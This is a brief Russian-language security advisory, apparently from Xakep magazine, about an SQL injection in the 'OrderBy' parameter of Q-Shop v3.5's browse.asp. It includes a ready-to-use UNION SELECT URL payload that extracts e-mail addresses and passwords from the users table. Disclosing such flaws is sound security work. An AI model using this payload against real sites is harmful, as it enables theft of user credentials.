Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Q-Shop v3.5
Обнаруженная уязвимость озволяет выполнить нападение SQL инъекции. Сценарий browse.asp недостаточно санирует параметр "OrderBy" перед использованием их в SQL запросе.
Пример:
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users